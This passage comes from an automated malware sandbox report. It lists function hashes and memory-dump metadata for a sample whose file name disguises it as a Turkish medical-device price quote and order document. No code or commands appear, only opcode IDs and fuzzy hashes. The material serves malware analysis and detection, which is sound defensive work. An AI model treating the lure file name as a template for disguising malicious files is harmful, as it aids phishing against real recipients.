                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 98aaf1936b5179b88cd0ea555055ef017d68b8076d2121b910302d2e4cb0bcb4
                                                                                                                          • Instruction ID: fa868e781974b16ddfe7ef037827214c7a6dea013730c597d0256900b74b1eb5
                                                                                                                          • Opcode Fuzzy Hash: 98aaf1936b5179b88cd0ea555055ef017d68b8076d2121b910302d2e4cb0bcb4
                                                                                                                          • Instruction Fuzzy Hash: F2314D31E2122A8FDB90DF68C854AEDBBF2BF89300F15446AD805EB361D7759941CB90
                                                                                                                          Function 0765C1A1 Relevance: .1, Instructions: 81COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 3f56143bac8a7619ff894e1a542220179be5db2def9eb2f55bfadde3ed77f561
                                                                                                                          • Instruction ID: d8de734892ab61b7db22f634b1191c56d8b76716e84313db1a6e5019504d2f74
                                                                                                                          • Opcode Fuzzy Hash: 3f56143bac8a7619ff894e1a542220179be5db2def9eb2f55bfadde3ed77f561
                                                                                                                          • Instruction Fuzzy Hash: 9E21A3F1A2C357CFC7218AECC890775B7B0AB47254F04806BCD63CB245C6659906EBB6
                                                                                                                          Function 07656C11 Relevance: .1, Instructions: 81COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 2d63148445ef1341d1ec017710e25e72a1b8a6e9e47927d43705fb8af982bbfe
                                                                                                                          • Instruction ID: 60ea069032c71321754337acde8e58d62f39e287419a68ca8ed78d66e298eb5d
                                                                                                                          • Opcode Fuzzy Hash: 2d63148445ef1341d1ec017710e25e72a1b8a6e9e47927d43705fb8af982bbfe
                                                                                                                          • Instruction Fuzzy Hash: 1531CEB0A14208CFC744DB58D45176AB7F2EB8AB18F94846AC927DB341CB359D43EF91
                                                                                                                          Function 076522E3 Relevance: .1, Instructions: 80COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4e61e505b02c92215a81ee993d14c7e276bc048c2d177d161d9110366d99a5f7
                                                                                                                          • Instruction ID: e704eba20186d9adb3f6ad0fb61818976aa58bd6e37988c9335ca0ce4a5d5b76
                                                                                                                          • Opcode Fuzzy Hash: 4e61e505b02c92215a81ee993d14c7e276bc048c2d177d161d9110366d99a5f7
                                                                                                                          • Instruction Fuzzy Hash: C321F3B17043018FE765DF78E4947AB7BE2FB84210F14846AD809CB346DB309C01CB61
                                                                                                                          Function 06227D50 Relevance: .1, Instructions: 80COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: bb9c938c61120c2ef401d9666b5be9a1bd94f7ff6cc705b58b986142448c4cb7
                                                                                                                          • Instruction ID: ed8f0a79f7c22a56d112b660304da2629e2d353fdd0e911ad9c62eac09673cce
                                                                                                                          • Opcode Fuzzy Hash: bb9c938c61120c2ef401d9666b5be9a1bd94f7ff6cc705b58b986142448c4cb7
                                                                                                                          • Instruction Fuzzy Hash: 83317C35A24221DFC754DF28C458AA97BF6FF8A700F1544AAE806DB362CB75DC01CBA0
                                                                                                                          Function 0765C4E0 Relevance: .1, Instructions: 79COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6a365715471b357856146cc34640348778cab004e4d3139f70f059c804e68a7e
                                                                                                                          • Instruction ID: 32b0c1e2de2b96363a3c91ea48b6dbb962b9fd1075f42bb8fda0202a50fcdf6d
                                                                                                                          • Opcode Fuzzy Hash: 6a365715471b357856146cc34640348778cab004e4d3139f70f059c804e68a7e
                                                                                                                          • Instruction Fuzzy Hash: C021A7F1A38353CBD70087A8C840B7977A1EB47315F148567AD13C7291C724E566B776
                                                                                                                          Function 07650FC0 Relevance: .1, Instructions: 79COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 25c84183412b1ef560338135c51ccb90c4e8924003eb63713476f800ea3c1b6f
                                                                                                                          • Instruction ID: 07f3f9078261253096d685e582b4524c1093305fdf5fc51cff6c4f1618e306eb
                                                                                                                          • Opcode Fuzzy Hash: 25c84183412b1ef560338135c51ccb90c4e8924003eb63713476f800ea3c1b6f
                                                                                                                          • Instruction Fuzzy Hash: 12315731A10609DFDB04EFA8C8548DDBB75FF89300F018659E5157B265FB70AA49CB91
                                                                                                                          Function 06229250 Relevance: .1, Instructions: 79COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b27dbc5a1d62845fea9b92af8d3710d7390f77c29d253f04444a4d22cdffccde
                                                                                                                          • Instruction ID: eb03d9d7c2b9b06b7de01eb2d8c1657c5c24e8d84768d97835dd9b09d7d90646
                                                                                                                          • Opcode Fuzzy Hash: b27dbc5a1d62845fea9b92af8d3710d7390f77c29d253f04444a4d22cdffccde
                                                                                                                          • Instruction Fuzzy Hash: 46212676F206225FEB24CA66C8C55BE77E6FBC4210F28852AD946D3794CA34ED80C761
                                                                                                                          Function 0765C308 Relevance: .1, Instructions: 77COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e3c88d02cdbd597df96ce2b8d5a2399937c191072b1fa99a8fbd3901777999c4
                                                                                                                          • Instruction ID: a541abfd1fb93e57ad2a782e6739771adfd5fa0ee0b09aeb272f4e7e4ca489fd
                                                                                                                          • Opcode Fuzzy Hash: e3c88d02cdbd597df96ce2b8d5a2399937c191072b1fa99a8fbd3901777999c4
                                                                                                                          • Instruction Fuzzy Hash: 6321F2B072870BDBD7248A18D841A7A73A3ABC2700F548027DC478B685CAB1CC47A773
                                                                                                                          Function 07650FD0 Relevance: .1, Instructions: 77COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 604f365b53c88a9f511c702bf4f273d29a406c14073f95e78a24d3ae0cc24e71
                                                                                                                          • Instruction ID: 2613bede8ebdb2df7ce53e4a8cc70c4ed6298950e683a59970eb52661093724c
                                                                                                                          • Opcode Fuzzy Hash: 604f365b53c88a9f511c702bf4f273d29a406c14073f95e78a24d3ae0cc24e71
                                                                                                                          • Instruction Fuzzy Hash: 93313231A10609DFCB04EFA8C8948DDBBB5FF89300F018659E5156B265FB70A989CB91
                                                                                                                          Function 076529E0 Relevance: .1, Instructions: 76COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 659fa80ceb2adfee0b78a68740df2cb8b3437012864ec3efe4c55520be8beed6
                                                                                                                          • Instruction ID: 28d2727eb93c90e62bce2a2584f09a3d8ff998c2bce90652888731a4ca20621f
                                                                                                                          • Opcode Fuzzy Hash: 659fa80ceb2adfee0b78a68740df2cb8b3437012864ec3efe4c55520be8beed6
                                                                                                                          • Instruction Fuzzy Hash: A721A1B4B10106DFDB20DFA5E954BAAB7F5FB49361F004129E91AD7740DB34D802CBA1
                                                                                                                          Function 0622E728 Relevance: .1, Instructions: 76COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d6d53e7dca681cccd1d1f74a9d96c9d7cd7afea5040ac65fd324b65094d52558
                                                                                                                          • Instruction ID: e770e5494eee5b53c82aa2bf580ef94fc7568ea940ce092a73a369ad1aa2242d
                                                                                                                          • Opcode Fuzzy Hash: d6d53e7dca681cccd1d1f74a9d96c9d7cd7afea5040ac65fd324b65094d52558
                                                                                                                          • Instruction Fuzzy Hash: C421A131F1061ADFCB51EBB8D4546BDB7F4EF88210F01826AE919E7251EF309941CB91
                                                                                                                          Function 011FD56C Relevance: .1, Instructions: 75COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1339152319.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_11fd000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f08ed0bfa7e93f664029310c9a53ccfc8fe24a26cf3889c47ac01b1a96114a75
                                                                                                                          • Instruction ID: 6e74ef28534c3fb8514b6493a10d8f81b140567c7d64cce7ea6a2af1cfd8ec94
                                                                                                                          • Opcode Fuzzy Hash: f08ed0bfa7e93f664029310c9a53ccfc8fe24a26cf3889c47ac01b1a96114a75
                                                                                                                          • Instruction Fuzzy Hash: 6021F571504204EFDF19DF94E9C4B26BFA5FB88328F24856DEA090F256C336D456CBA2
                                                                                                                          Function 0622A338 Relevance: .1, Instructions: 74COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0e8cbcbb38737985828b95f0b4061e3b51e87ea5f9d72316c903268d43d6917e
                                                                                                                          • Instruction ID: c5e47b3e8536a702eb33321d7cb0b265dd65fdf88d97aa476000a95906f43c01
                                                                                                                          • Opcode Fuzzy Hash: 0e8cbcbb38737985828b95f0b4061e3b51e87ea5f9d72316c903268d43d6917e
                                                                                                                          • Instruction Fuzzy Hash: CD21CF30B103129BD3B4AB758854A6AB3F7AFC9144B1448BCCD828BB91EF39DC46C721
                                                                                                                          Function 0120D1B4 Relevance: .1, Instructions: 72COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1339204549.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_120d000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b857d32dec4318f1aa50cdbe221cb7484ff58bbdbb642eb0f089ae59d2ac7ee0
                                                                                                                          • Instruction ID: 456b2d344fe2aeae6d147ce53654fe83f04223b691d366446d9ff9c6c9223fed
                                                                                                                          • Opcode Fuzzy Hash: b857d32dec4318f1aa50cdbe221cb7484ff58bbdbb642eb0f089ae59d2ac7ee0
                                                                                                                          • Instruction Fuzzy Hash: E9213471515308EFDB06DFE4C5C0B26BBA1FB84324F20C66DE9094B283C376D846CA61
                                                                                                                          Function 0120D36C Relevance: .1, Instructions: 72COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1339204549.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_120d000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9357f6dde6a48ff9685cbd7bb0944946b62a8e4b97e2feaca2163caf8838f94d
                                                                                                                          • Instruction ID: 490e9c935fe52242bb685cc91eaa782980302b16e95fe80acdc77ab4a5fac78c
                                                                                                                          • Opcode Fuzzy Hash: 9357f6dde6a48ff9685cbd7bb0944946b62a8e4b97e2feaca2163caf8838f94d
                                                                                                                          • Instruction Fuzzy Hash: AC210071514308AFDB16DFA4D5C0B26BBA1EB84314F20C66DE9094B293C376E846CA62
                                                                                                                          Function 076502A0 Relevance: .1, Instructions: 71COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 857b372e915bda2039fed03801ef04897ccb76005a590b1cad89651acbc5d538
                                                                                                                          • Instruction ID: a0f6ed89948d2521f7c8b4704ed81f1f397649ed57a7063db9f368e21efa2bbf
                                                                                                                          • Opcode Fuzzy Hash: 857b372e915bda2039fed03801ef04897ccb76005a590b1cad89651acbc5d538
                                                                                                                          • Instruction Fuzzy Hash: CF213275A1020A9FCF44EF79C8848EEF7B5FF88300B518669D916B7351EB30A945CBA0
                                                                                                                          Function 0765C536 Relevance: .1, Instructions: 70COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 51d98d067341fb22edc096ff98a9be0ab79f7bdaa993773d81ef8195e88e3a1c
                                                                                                                          • Instruction ID: 0347691610b971b13a9dec79c02dee6968c0027d0fb7d0ca2ec666114cec4a77
                                                                                                                          • Opcode Fuzzy Hash: 51d98d067341fb22edc096ff98a9be0ab79f7bdaa993773d81ef8195e88e3a1c
                                                                                                                          • Instruction Fuzzy Hash: C32165F0E38713C7D71086A8C840A79B3A1AB4B355F108227AD13C7390C774E5A6BA76
                                                                                                                          Function 07650290 Relevance: .1, Instructions: 70COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 3dcb4f487276e1f3551d76dee25ba7851b065a35ac35d21ccbcdc43a428e9b93
                                                                                                                          • Instruction ID: 245fade6d16e15297e1125cb9ad3b4ac3e1bb016e53b64a9db4fb84385ad734c
                                                                                                                          • Opcode Fuzzy Hash: 3dcb4f487276e1f3551d76dee25ba7851b065a35ac35d21ccbcdc43a428e9b93
                                                                                                                          • Instruction Fuzzy Hash: B7216D75B102068FDB44DF78C8948AEBBB5FF88300B40457AD906E7352EB30A905CBA0
                                                                                                                          Function 07656567 Relevance: .1, Instructions: 68COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6970af26a40651b4e2e69a61f2390abb94b6ab78960556aa2e714d2b9b381592
                                                                                                                          • Instruction ID: 03a489ebeb51713a567406ea41a2b40927a3ab0054c5c6927591bc9f1f0c7855
                                                                                                                          • Opcode Fuzzy Hash: 6970af26a40651b4e2e69a61f2390abb94b6ab78960556aa2e714d2b9b381592
                                                                                                                          • Instruction Fuzzy Hash: 8A2136B4E1020A9FDF40DFB8D9506EEBBF2AB48310F104169D916F7344EB309A41CBA1
                                                                                                                          Function 0622E330 Relevance: .1, Instructions: 66COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f6d748398fd01ef01f8adf04883e8134aca4a4cccb131a094c4f2be93f507385
                                                                                                                          • Instruction ID: 10a3d292d2325826d47d735ce2bca97601daf7b58e809d951d0fa5f85ad6263f
                                                                                                                          • Opcode Fuzzy Hash: f6d748398fd01ef01f8adf04883e8134aca4a4cccb131a094c4f2be93f507385
                                                                                                                          • Instruction Fuzzy Hash: 6A11EB347253A25FD7558738C8545AD7FE5AFCA21071941EBE085CB3B3CA248C078761
                                                                                                                          Function 0622C310 Relevance: .1, Instructions: 66COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6e98968caff4e4bea7cce954b37a0bbe5e5d632cb51076db6a90fd0dca16fa4d
                                                                                                                          • Instruction ID: 0fb6acc369cfc5953283b029ba23c64734d2efc24f42f12fccf949fd2857906e
                                                                                                                          • Opcode Fuzzy Hash: 6e98968caff4e4bea7cce954b37a0bbe5e5d632cb51076db6a90fd0dca16fa4d
                                                                                                                          • Instruction Fuzzy Hash: DD21A13092071ADFDB51EF68C8556EEBBB1FF49300F008A6DD8467B250EB709948CB91
                                                                                                                          Function 07653FC8 Relevance: .1, Instructions: 65COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 1bbef5031902fc5b611867cce3ac144c4ccf526f6db33647edf6eaab902dabd9
                                                                                                                          • Instruction ID: b953c22dc0fd0c5d9191eda133fc2bbb9f4d3b1922d1327e01a9d47ac0c6b61b
                                                                                                                          • Opcode Fuzzy Hash: 1bbef5031902fc5b611867cce3ac144c4ccf526f6db33647edf6eaab902dabd9
                                                                                                                          • Instruction Fuzzy Hash: 06114831B483905FD725DBB998206AF7FFA8FC6650F0580ABE906C7792DD248C0683E1
                                                                                                                          Function 06229718 Relevance: .1, Instructions: 65COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e02c094939af7df0f071e9745e98d69d92ede9404a6349e43cdab844d6d2e350
                                                                                                                          • Instruction ID: 690acaaf53d0858682d0ebd7110956e715a9052309906446832cf15864059951
                                                                                                                          • Opcode Fuzzy Hash: e02c094939af7df0f071e9745e98d69d92ede9404a6349e43cdab844d6d2e350
                                                                                                                          • Instruction Fuzzy Hash: 5911E772F24117FFCB916A95D9441EEBFB4EB40340B200CB1D849B3544E2718A328BD4
                                                                                                                          Function 076529D0 Relevance: .1, Instructions: 63COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: cb4079fed7820641b968e8bcb6d6598436cdf4b34af76e5408284c7cc2c6a365
                                                                                                                          • Instruction ID: d604eda0d38bff310831043a637a659747e7bcb79b36b8844ae7d0712292a002
                                                                                                                          • Opcode Fuzzy Hash: cb4079fed7820641b968e8bcb6d6598436cdf4b34af76e5408284c7cc2c6a365
                                                                                                                          • Instruction Fuzzy Hash: 5611AFB47102428FDB219B64E954B6ABBF5FB46350F048159E81AD7781DB34D806CB61
                                                                                                                          Function 0765A2A8 Relevance: .1, Instructions: 57COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c3c2256cde5e9841a84810c0ad06a1e578b6e4bffc025086cba2349206688741
                                                                                                                          • Instruction ID: a1b9f785e3cc6284faf442071073e182a1e50a84cc87b9af77fdd16fa573d4aa
                                                                                                                          • Opcode Fuzzy Hash: c3c2256cde5e9841a84810c0ad06a1e578b6e4bffc025086cba2349206688741
                                                                                                                          • Instruction Fuzzy Hash: C211C0B210C3C46FCB069BA0AC659DA3FB59F46120B0981DBE485DB263D5318A55E3A2
                                                                                                                          Function 011FD567 Relevance: .1, Instructions: 56COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1339152319.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_11fd000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b6c069b3d400d01fa3022dda7a4192202465086b1da4fe746ff97b9e65d68317
                                                                                                                          • Instruction ID: 61dc985658437b08fa6c675c6116d215173dd13b7598aeba8e6d252301af92d9
                                                                                                                          • Opcode Fuzzy Hash: b6c069b3d400d01fa3022dda7a4192202465086b1da4fe746ff97b9e65d68317
                                                                                                                          • Instruction Fuzzy Hash: 8711AF76504240DFCF16CF54E9C4B26BF62FB88324F2486ADD9090B657C336D456CBA1
